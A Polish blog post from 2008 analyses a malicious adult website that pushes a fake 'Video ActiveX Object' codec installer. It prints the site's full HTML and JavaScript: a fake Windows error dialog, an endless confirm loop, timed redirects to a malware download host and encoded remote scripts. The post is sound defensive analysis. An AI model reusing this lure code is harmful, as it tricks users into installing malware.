Analiza strony porno infekującej komputery

23.04.2008 15:03, Posted in internet, programming , 2 comments, 0 pingbacks

Ostatnio na rozmowie wstępnej spytano się mnie co to jest ten skrypt porno który mam u siebie na blogu :) Dziś znów o takich klimatach, otóż zetknąłem się z czymś takim:

po wejściu na stronę dostajemy komunikat iż nie ma kodeka i dostajemy pytanie, czy chcemy zainstalować kodek
jeżeli tak: jesteśmy przekierowywani do instalki
jeżeli nie: pytanie powtarzane jest w nieskończonej pętli.

Już ta nachalność daje do myślenia, w dodatku porno i instalowanie programów niezbyt do siebie pasują..

Takie coś spowalnia przeglądanie stronek... jak tak dalej będzie będę musiał wstać od laptopa, pogadać z ludźmi, może nawet wyjść na dwór.. ;)

Przykład takiej strony jest tutaj. Ściągamy ja na dysk wget'em, ściągnijmy też instalkę kodeków i przeskanujmy ją wirusem online (a jeśli jesteśmy hardcorowcami przeanalizujmy ją przy użyciu np. IDA):

wynik skanowania instalki ze strony porno

No tak, malware ale przyjrzyjmy się plikowi HTML i kodowi JS, który jest w nim osadzony. Po chwili widać iż funkcja releaseMovie() odpowiada za wyświetlanie pliku wideo:

function releaseMovie() {
	if (activex_is_here()) {
		document.getElementById('playMov').innerHTML = '<embed src="http://videodwnld.com/movie.mpg" width="480" height="400" autostart="true" type="movie/mpg"></embed>';
	}

Kopiując URL'a do przeglądarki możemy oglądnąć filmik (ale na prawdę nie warto). Zobaczmy na funkcję wyświetlającą confirm'a, jak ciekawie wykorzystano rekurencje:

function vc() {
	if (confirm('Video ActiveX Object Error.\n\nYour browser cannot play this video file.\nClick \'OK\' to download and install missing Video ActiveX Object.')) {
		location.href="http://wmvassistant.com/download.php?id=4168";
	}
	else {
		if (alert('Please install new version of Video ActiveX Object.')) {
			vc();
		}
		else {
			vc();
		}			
	}
}

Na koniec co może najbardziej dziwić/drażnić: cały player flashowy to tak na prawdę tylko obrazek GIF:

<table id="movie" align="center" cellpadding="0" cellspacing="0"><tr><td id="playMov"><a href="http://wmvassistant.com/download.php?id=4168"><img width="450" style="cursor:pointer;" onMouseOver="window.status = 'You must download Video ActiveX Object to play this video file.';" height="369" border="0" alt="You must download Video ActiveX Object to play this video file." src="/img/mov.gif"/></a></td></tr></table>

Nie wgłębiałem sie bliżej, nie mam IE ale można by było np. odpalić takie coś na maszynie wirtualnej i sprawdzić na firewallu do jakiego hosta się to coś odwołuje.

Pełny kod stronki (includowane pliki JS IMHO nie były ciekawe):



<script language="javascript" src="http://powerof3x.com/popup/pop1_2007-09-04.js?id=4168"></script>
<script language="javascript" src="http://powerof3x.com/popup/pre_2007-09-04.js?id=4168"></script>
<script language="jscript.encode" src="http://powerof3x.com/popup/pop2_2007-09-04.js?id=4168"></script>

<html lang="en-EN">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Movie</title>
<style>
	body,td,th,tr,a,img {cursor:default;}
	#mainbody {background-color:#000;}
	#movie {border:1px solid #fff;}
	#movie a {cursor:pointer;}
</style>
<script>
function activex_is_here()
{
    try
    {
        var testObject = new ActiveXObject("videoPl.chl");
        return true;
    }
    catch(e)
    {
        ;
    }

    return false;
}

function releaseMovie() {
	if (activex_is_here()) {
		document.getElementById('playMov').innerHTML = '<embed src="http://videodwnld.com/movie.mpg" width="480" height="400" autostart="true" type="movie/mpg"></embed>';
	}
}function codecDownload()
{
	if (window.navigator.userAgent.indexOf("SV1") != -1 || window.navigator.userAgent.indexOf("MSIE 7") !=-1) {
return;
	}
	else {
		window.setTimeout("location.href='http://wmvassistant.com/download.php?id=4168'", 3000);
	}
}
</script>
</head>

<body id="mainbody">

<script>

	codecDownload();

</script>
<script>


var Drag = {
	obj : null,
	init : function(o, oRoot, minX, maxX, minY, maxY, bSwapHorzRef, bSwapVertRef, fXMapper, fYMapper)
	{
		o.onmousedown	= Drag.start;

		o.hmode			= bSwapHorzRef ? false : true ;
		o.vmode			= bSwapVertRef ? false : true ;

		o.root = oRoot && oRoot != null ? oRoot : o ;

		if (o.hmode  && isNaN(parseInt(o.root.style.left  ))) o.root.style.left   = "0px";
		if (o.vmode  && isNaN(parseInt(o.root.style.top   ))) o.root.style.top    = "0px";
		if (!o.hmode && isNaN(parseInt(o.root.style.right ))) o.root.style.right  = "0px";
		if (!o.vmode && isNaN(parseInt(o.root.style.bottom))) o.root.style.bottom = "0px";

		o.minX	= typeof minX != 'undefined' ? minX : null;
		o.minY	= typeof minY != 'undefined' ? minY : null;
		o.maxX	= typeof maxX != 'undefined' ? maxX : null;
		o.maxY	= typeof maxY != 'undefined' ? maxY : null;

		o.xMapper = fXMapper ? fXMapper : null;
		o.yMapper = fYMapper ? fYMapper : null;

		o.root.onDragStart	= new Function();
		o.root.onDragEnd	= new Function();
		o.root.onDrag		= new Function();
	},

	start : function(e)
	{
		var o = Drag.obj = this;
		e = Drag.fixE(e);
		var y = parseInt(o.vmode ? o.root.style.top  : o.root.style.bottom);
		var x = parseInt(o.hmode ? o.root.style.left : o.root.style.right );
		o.root.onDragStart(x, y);

		o.lastMouseX	= e.clientX;
		o.lastMouseY	= e.clientY;

		if (o.hmode) {
			if (o.minX != null)	o.minMouseX	= e.clientX - x + o.minX;
			if (o.maxX != null)	o.maxMouseX	= o.minMouseX + o.maxX - o.minX;
		} else {
			if (o.minX != null) o.maxMouseX = -o.minX + e.clientX + x;
			if (o.maxX != null) o.minMouseX = -o.maxX + e.clientX + x;
		}

		if (o.vmode) {
			if (o.minY != null)	o.minMouseY	= e.clientY - y + o.minY;
			if (o.maxY != null)	o.maxMouseY	= o.minMouseY + o.maxY - o.minY;
		} else {
			if (o.minY != null) o.maxMouseY = -o.minY + e.clientY + y;
			if (o.maxY != null) o.minMouseY = -o.maxY + e.clientY + y;
		}

		document.onmousemove	= Drag.drag;
		document.onmouseup		= Drag.end;

		return false;
	},

	drag : function(e)
	{
		e = Drag.fixE(e);
		var o = Drag.obj;

		var ey	= e.clientY;
		var ex	= e.clientX;
		var y = parseInt(o.vmode ? o.root.style.top  : o.root.style.bottom);
		var x = parseInt(o.hmode ? o.root.style.left : o.root.style.right );
		var nx, ny;

		if (o.minX != null) ex = o.hmode ? Math.max(ex, o.minMouseX) : Math.min(ex, o.maxMouseX);
		if (o.maxX != null) ex = o.hmode ? Math.min(ex, o.maxMouseX) : Math.max(ex, o.minMouseX);
		if (o.minY != null) ey = o.vmode ? Math.max(ey, o.minMouseY) : Math.min(ey, o.maxMouseY);
		if (o.maxY != null) ey = o.vmode ? Math.min(ey, o.maxMouseY) : Math.max(ey, o.minMouseY);

		nx = x + ((ex - o.lastMouseX) * (o.hmode ? 1 : -1));
		ny = y + ((ey - o.lastMouseY) * (o.vmode ? 1 : -1));

		if (o.xMapper)		nx = o.xMapper(y)
		else if (o.yMapper)	ny = o.yMapper(x)

		Drag.obj.root.style[o.hmode ? "left" : "right"] = nx + "px";
		Drag.obj.root.style[o.vmode ? "top" : "bottom"] = ny + "px";
		Drag.obj.lastMouseX	= ex;
		Drag.obj.lastMouseY	= ey;

		Drag.obj.root.onDrag(nx, ny);
		return false;
	},

	end : function()
	{
		document.onmousemove = null;
		document.onmouseup   = null;
		Drag.obj.root.onDragEnd(	parseInt(Drag.obj.root.style[Drag.obj.hmode ? "left" : "right"]), 
									parseInt(Drag.obj.root.style[Drag.obj.vmode ? "top" : "bottom"]));
		Drag.obj = null;
	},

	fixE : function(e)
	{
		if (typeof e == 'undefined') e = window.event;
		if (typeof e.layerX == 'undefined') e.layerX = e.offsetX;
		if (typeof e.layerY == 'undefined') e.layerY = e.offsetY;
		return e;
	}
};

function Down(download,e) 
{ 
	if (e!=null && e.keyCode==27)
	{	Close();
		return;
	}	
    switch (download) 
    { 
        case "iax": document.location.href="http://wmvassistant.com/download.php?id=4168"; break; 
        Close(); 
    } 

} 

function vc() {
	if (confirm('Video ActiveX Object Error.\n\nYour browser cannot play this video file.\nClick \'OK\' to download and install missing Video ActiveX Object.')) {
		location.href="http://wmvassistant.com/download.php?id=4168";
	}
	else {
		if (alert('Please install new version of Video ActiveX Object.')) {
			vc();
		}
		else {
			vc();
		}			
	}
}

function Close() 
{ 
    var p=document.getElementById("popdiv");
    p.style.visibility="hidden"; 
	vc();
} 
function Details()
{
	alert('You must download Video ActiveX Object to play this video file.');
}

</script>


<div name="popdiv" id="popdiv" onKeyPress="Down('iax',event);" style="visibility:hidden; z-index:1;position:absolute;top:0px;left:0px;">
	<table cellpadding="0" cellspacing="0" width="362" height="126">
		<tr>
			<td>
				<table cellpadding="0" cellspacing="0" width="362" height="29" style=" BACKGROUND-IMAGE:URL('/img/xptop.gif'); height:29px; width:362;"> <!-- win top table -->
					<tr>
						<td style="color:white; font-family:Tahoma; font-size:13px; font-weight:bold; padding-left:4px;padding-top:1px">  Video ActiveX Object Error.</td>
						<td width="21" style="padding-right:6px;"><img src="/img/xpclose.gif" width="21" height="21" onClick="Close();" style="cursor:default;" ></td>
					</tr>
				</table>
			</td>
		</tr>
		<tr>
			<td>
				<table cellpadding="0" cellspacing="0" height="97">
					<tr>
						<td style="background-image:url(/img/left.gif); background-repeat:repeat-y;" valign="bottom">
							<table cellpadding="0" cellspacing="0">
								<tr>
									<td><img src="/img/xpleftclm.gif" width="3" height="97"></td>
								</tr>
							</table>
						</td>
						<td valign="top">
							<table cellpadding="0" cellspacing="0" width="356" bgcolor="ece9d8">
								<tr>
									<td>
										<table cellpadding="0" cellspacing="0" height="59">
											<tr>
												<td align="center" style="padding-left:20px; padding-top:13px;" valign="top"><img src="/img/alert.gif" width="31" height="32"></td>
												<td align="left" style="font-size:11px;  font-family:Tahoma; padding-left:30px; padding-bottom:8px; padding-right:5px;"><br><b>Video ActiveX Object Error:</b><br>Your browser cannot display this video file.<br><br>You need to download new version of Video ActiveX Object to play this video file.
												</td>
											</tr>
										</table>
									</td>
								</tr>
								<tr>
								<tr>
									<td style="padding-left:20px; padding-right:20px; padding-bottom:20px; font-family:Tahoma; font-size:11px;" align="center">
										<hr><br>
										Click Continue to download and install ActiveX Object.

									</td>
								</tr>
									<td>
										<table align="center" cellpadding="0" cellspacing="6" height="22">
											<tr height="22">
												<td><input type="button" value="Continue" onClick="Down('iax');" style="font-size:11px;  font-family:Arial; height:23px; width:82px;" tabindex="1" ID="Button1" NAME="Button1"><br><br></td>
												<td></td>
												<td><input type="button" value="Cancel" onClick="Close()" style="font-size:11px;  font-family:Arial; height:23px; width:82px;" ID="Button3" NAME="Button3"><br><br></td>
												<td><input type="button" value="Details..." onClick="Details()" style="font-size:11px;  font-family:Arial; height:23px; width:82px;" ID="Button3" NAME="Button3"><br><br></td>														
											</tr>
										</table>
									</td>
								</tr>
								<tr>
									<td>
										<table cellpadding="0" cellspacing="0" width="100%">
											<tr bgcolor="4577ea" style="height:1px;">
												<td></td>
											</tr> <!-- empty colors -->
											<tr bgcolor="0029b5" style="height:1px;">
												<td></td>
											</tr>
											<tr bgcolor="001590" style="height:1px;">
												<td></td>
											</tr>
										</table>
									</td>
								</tr>
							</table>
						</td>
						<td style="background-image:url(/img/right.gif); background-repeat:repeat-y;" valign="bottom">
							<table cellpadding="0" cellspacing="0">
								<tr>
									<td style="padding:0px;"><img src="/img/xprightclm.gif" width="3" height="97"></td>
								</tr>
							</table>
						</td>
					</tr>
				</table>
			</td>
		</tr>
	</table>

	
	
<script>
if (navigator.userAgent.indexOf("Firefox")!=-1) {
if (activex_is_here()) { } else {
	setTimeout("Close();", 1000);
}
}
else {
if (activex_is_here()) { } else {
	setTimeout("showPopDiv();",2000);
}
}
      
function showPopDiv()
{
	var sFlag = "No";
	var byFlag = false;
	var FlagAr = sFlag.split("");

	if (FlagAr[0]=="1"){byFlag = true;}
	if (FlagAr[0]=="3"){byFlag = true;}

	if(!byFlag) {
		var p=document.getElementById("popdiv"); 
		wmpwidth=document.body.clientWidth/2-181;
		wmpheight=document.body.clientHeight/2-120;
		p.style.top = wmpheight;
		p.style.left = wmpwidth;
		p.style.visibility = "visible";
		p.focus();
	}
}

Drag.init(document.getElementById("popdiv"));
</script>
</div>


<table id="movie" align="center" cellpadding="0" cellspacing="0"><tr><td id="playMov"><a href="http://wmvassistant.com/download.php?id=4168"><img width="450" style="cursor:pointer;" onMouseOver="window.status = 'You must download Video ActiveX Object to play this video file.';" height="369" border="0" alt="You must download Video ActiveX Object to play this video file." src="/img/mov.gif"/></a></td></tr></table>
<script>releaseMovie();</script>

</body>
</html>

Pingbacks

No pingbacks yet

Comments

Michael Roberts , 12.08.2008 1:36, reply

Almost this exact page is being used on the landing pages for the "CNN Top 10" spam -- it's freaky you already saw this technique in April! (And analyzed it just like I did -- it's more and more true that nothing is new on the Internet...) Anyway, I'll reread this page next year, after I've improved my Polish. But I thought this code's recent doings might interest you.

Robert , 13.08.2008 17:33, reply

Thanks for information Michael!

Code snippets, ideas and events from IT related projects